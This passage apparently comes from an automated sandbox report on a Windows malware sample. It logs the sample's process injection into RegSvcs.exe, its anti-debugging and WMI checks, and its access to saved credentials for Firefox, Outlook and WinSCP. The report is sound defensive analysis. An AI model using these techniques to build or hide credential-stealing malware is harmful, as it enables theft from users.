                    Source: C:\Users\user\Desktop\7F7R8soxHM.exeCode function: 0_2_00EC8713 AdjustTokenPrivileges,CloseHandle,0_2_00EC8713
                    Source: C:\Users\user\Desktop\7F7R8soxHM.exeCode function: 0_2_00EC8CC3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,0_2_00EC8CC3
                    Source: C:\Users\user\Desktop\7F7R8soxHM.exeCode function: 0_2_00EDB59E SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,0_2_00EDB59E
                    Source: C:\Users\user\Desktop\7F7R8soxHM.exeCode function: 0_2_00EEF121 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,0_2_00EEF121
                    Source: C:\Users\user\Desktop\7F7R8soxHM.exeCode function: 0_2_00EE86D0 CoInitialize,CoUninitialize,CoCreateInstance,IIDFromString,VariantInit,VariantClear,0_2_00EE86D0
                    Source: C:\Users\user\Desktop\7F7R8soxHM.exeCode function: 0_2_00E74FE9 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,0_2_00E74FE9
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMutant created: NULL
                    Source: C:\Users\user\Desktop\7F7R8soxHM.exeFile created: C:\Users\user\AppData\Local\Temp\aut5DEB.tmpJump to behavior
                    Source: 7F7R8soxHM.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                    Source: C:\Users\user\Desktop\7F7R8soxHM.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: 7F7R8soxHM.exeReversingLabs: Detection: 65%
                    Source: 7F7R8soxHM.exeVirustotal: Detection: 63%
                    Source: unknownProcess created: C:\Users\user\Desktop\7F7R8soxHM.exe "C:\Users\user\Desktop\7F7R8soxHM.exe"
                    Source: C:\Users\user\Desktop\7F7R8soxHM.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\7F7R8soxHM.exe"
                    Source: C:\Users\user\Desktop\7F7R8soxHM.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\7F7R8soxHM.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\7F7R8soxHM.exeSection loaded: wsock32.dllJump to behavior
                    Source: C:\Users\user\Desktop\7F7R8soxHM.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\Desktop\7F7R8soxHM.exeSection loaded: winmm.dllJump to behavior
                    Source: C:\Users\user\Desktop\7F7R8soxHM.exeSection loaded: mpr.dllJump to behavior
                    Source: C:\Users\user\Desktop\7F7R8soxHM.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Users\user\Desktop\7F7R8soxHM.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\7F7R8soxHM.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\Desktop\7F7R8soxHM.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\Desktop\7F7R8soxHM.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\7F7R8soxHM.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\7F7R8soxHM.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\ProfilesJump to behavior
                    Source: 7F7R8soxHM.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                    Source: 7F7R8soxHM.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                    Source: 7F7R8soxHM.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                    Source: 7F7R8soxHM.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                    Source: 7F7R8soxHM.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                    Source: 7F7R8soxHM.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                    Source: 7F7R8soxHM.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                    Source: Binary string: wntdll.pdbUGP source: 7F7R8soxHM.exe, 00000000.00000003.1643867500.0000000004190000.00000004.00001000.00020000.00000000.sdmp, 7F7R8soxHM.exe, 00000000.00000003.1643414153.0000000004330000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: wntdll.pdb source: 7F7R8soxHM.exe, 00000000.00000003.1643867500.0000000004190000.00000004.00001000.00020000.00000000.sdmp, 7F7R8soxHM.exe, 00000000.00000003.1643414153.0000000004330000.00000004.00001000.00020000.00000000.sdmp
                    Source: 7F7R8soxHM.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                    Source: 7F7R8soxHM.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                    Source: 7F7R8soxHM.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                    Source: 7F7R8soxHM.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                    Source: 7F7R8soxHM.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                    Source: C:\Users\user\Desktop\7F7R8soxHM.exeCode function: 0_2_00EEC304 LoadLibraryA,GetProcAddress,0_2_00EEC304
                    Source: C:\Users\user\Desktop\7F7R8soxHM.exeCode function: 0_2_00ED8719 push FFFFFF8Bh; iretd 0_2_00ED871B
                    Source: C:\Users\user\Desktop\7F7R8soxHM.exeCode function: 0_2_00E9E94F push edi; ret 0_2_00E9E951
                    Source: C:\Users\user\Desktop\7F7R8soxHM.exeCode function: 0_2_00E9EA68 push esi; ret 0_2_00E9EA6A
                    Source: C:\Users\user\Desktop\7F7R8soxHM.exeCode function: 0_2_00E98B85 push ecx; ret 0_2_00E98B98
                    Source: C:\Users\user\Desktop\7F7R8soxHM.exeCode function: 0_2_00E9EC43 push esi; ret 0_2_00E9EC45
                    Source: C:\Users\user\Desktop\7F7R8soxHM.exeCode function: 0_2_00E9ED2C push edi; ret 0_2_00E9ED2E
                    Source: C:\Users\user\Desktop\7F7R8soxHM.exeCode function: 0_2_00E74A35 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_00E74A35
                    Source: C:\Users\user\Desktop\7F7R8soxHM.exeCode function: 0_2_00EF55FD IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_00EF55FD
                    Source: C:\Users\user\Desktop\7F7R8soxHM.exeCode function: 0_2_00E933C7 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00E933C7
                    Source: C:\Users\user\Desktop\7F7R8soxHM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\7F7R8soxHM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                    Malware Analysis System Evasion

                    barindex
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                    Source: C:\Users\user\Desktop\7F7R8soxHM.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_0-98301
                    Source: C:\Users\user\Desktop\7F7R8soxHM.exeAPI coverage: 4.7 %
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\Desktop\7F7R8soxHM.exeCode function: 0_2_00ED4696 GetFileAttributesW,FindFirstFileW,FindClose,0_2_00ED4696
                    Source: C:\Users\user\Desktop\7F7R8soxHM.exeCode function: 0_2_00EDC9C7 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_00EDC9C7
                    Source: C:\Users\user\Desktop\7F7R8soxHM.exeCode function: 0_2_00EDC93C FindFirstFileW,FindClose,0_2_00EDC93C
                    Source: C:\Users\user\Desktop\7F7R8soxHM.exeCode function: 0_2_00EDF200 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00EDF200
                    Source: C:\Users\user\Desktop\7F7R8soxHM.exeCode function: 0_2_00EDF35D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00EDF35D
                    Source: C:\Users\user\Desktop\7F7R8soxHM.exeCode function: 0_2_00EDF65E FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_00EDF65E
                    Source: C:\Users\user\Desktop\7F7R8soxHM.exeCode function: 0_2_00ED3A2B FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00ED3A2B
                    Source: C:\Users\user\Desktop\7F7R8soxHM.exeCode function: 0_2_00ED3D4E FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00ED3D4E
                    Source: C:\Users\user\Desktop\7F7R8soxHM.exeCode function: 0_2_00EDBF27 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_00EDBF27
                    Source: C:\Users\user\Desktop\7F7R8soxHM.exeCode function: 0_2_00E74AFE GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_00E74AFE
                    Source: 7F7R8soxHM.exe, 00000000.00000002.1658984984.0000000001720000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.2882256622.0000000000402000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: hgfsZrw6
                    Source: RegSvcs.exe, 00000001.00000002.2885335376.0000000005E90000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlldeExKK
                    Source: C:\Users\user\Desktop\7F7R8soxHM.exeAPI call chain: ExitProcess graph end nodegraph_0-97346
                    Source: C:\Users\user\Desktop\7F7R8soxHM.exeAPI call chain: ExitProcess graph end nodegraph_0-97420
                    Source: C:\Users\user\Desktop\7F7R8soxHM.exeCode function: 0_2_00EE41FD BlockInput,0_2_00EE41FD
                    Source: C:\Users\user\Desktop\7F7R8soxHM.exeCode function: 0_2_00E73B4C GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00E73B4C
                    Source: C:\Users\user\Desktop\7F7R8soxHM.exeCode function: 0_2_00EA5CCC EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,0_2_00EA5CCC
                    Source: C:\Users\user\Desktop\7F7R8soxHM.exeCode function: 0_2_00EEC304 LoadLibraryA,GetProcAddress,0_2_00EEC304
                    Source: C:\Users\user\Desktop\7F7R8soxHM.exeCode function: 0_2_01713540 mov eax, dword ptr fs:[00000030h]0_2_01713540
                    Source: C:\Users\user\Desktop\7F7R8soxHM.exeCode function: 0_2_017135A0 mov eax, dword ptr fs:[00000030h]0_2_017135A0
                    Source: C:\Users\user\Desktop\7F7R8soxHM.exeCode function: 0_2_01711ED0 mov eax, dword ptr fs:[00000030h]0_2_01711ED0
                    Source: C:\Users\user\Desktop\7F7R8soxHM.exeCode function: 0_2_00EC81F7 GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_00EC81F7
                    Source: C:\Users\user\Desktop\7F7R8soxHM.exeCode function: 0_2_00E9A395 SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00E9A395
                    Source: C:\Users\user\Desktop\7F7R8soxHM.exeCode function: 0_2_00E9A364 SetUnhandledExceptionFilter,0_2_00E9A364
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMemory allocated: page read and write | page guardJump to behavior

                    HIPS / PFW / Operating System Protection Evasion

                    barindex
                    Source: C:\Users\user\Desktop\7F7R8soxHM.exeSection loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe protection: execute and read and writeJump to behavior
                    Source: C:\Users\user\Desktop\7F7R8soxHM.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 8BD008Jump to behavior
                    Source: C:\Users\user\Desktop\7F7R8soxHM.exeCode function: 0_2_00EC8C93 LogonUserW,0_2_00EC8C93
                    Source: C:\Users\user\Desktop\7F7R8soxHM.exeCode function: 0_2_00E73B4C GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00E73B4C
                    Source: C:\Users\user\Desktop\7F7R8soxHM.exeCode function: 0_2_00E74A35 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_00E74A35
                    Source: C:\Users\user\Desktop\7F7R8soxHM.exeCode function: 0_2_00ED4EF5 mouse_event,0_2_00ED4EF5
                    Source: C:\Users\user\Desktop\7F7R8soxHM.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\7F7R8soxHM.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\7F7R8soxHM.exeCode function: 0_2_00EC81F7 GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_00EC81F7
                    Source: C:\Users\user\Desktop\7F7R8soxHM.exeCode function: 0_2_00ED4C03 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,0_2_00ED4C03
                    Source: 7F7R8soxHM.exeBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
                    Source: 7F7R8soxHM.exeBinary or memory string: Shell_TrayWnd
                    Source: C:\Users\user\Desktop\7F7R8soxHM.exeCode function: 0_2_00E9886B cpuid 0_2_00E9886B
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\7F7R8soxHM.exeCode function: 0_2_00EA50D7 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00EA50D7
                    Source: C:\Users\user\Desktop\7F7R8soxHM.exeCode function: 0_2_00EB2230 GetUserNameW,0_2_00EB2230
                    Source: C:\Users\user\Desktop\7F7R8soxHM.exeCode function: 0_2_00EA418A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,0_2_00EA418A
                    Source: C:\Users\user\Desktop\7F7R8soxHM.exeCode function: 0_2_00E74AFE GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_00E74AFE
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                    Stealing of Sensitive Information

                    barindex
                    Source: Yara matchFile source: dump.pcap, type: PCAP
                    Source: Yara matchFile source: 0.2.7F7R8soxHM.exe.1720000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.7F7R8soxHM.exe.1720000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000001.00000002.2883490395.000000000295E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000002.2882256622.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1658984984.0000000001720000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000002.2883490395.0000000002911000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: 7F7R8soxHM.exe PID: 7568, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 7584, type: MEMORYSTR
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
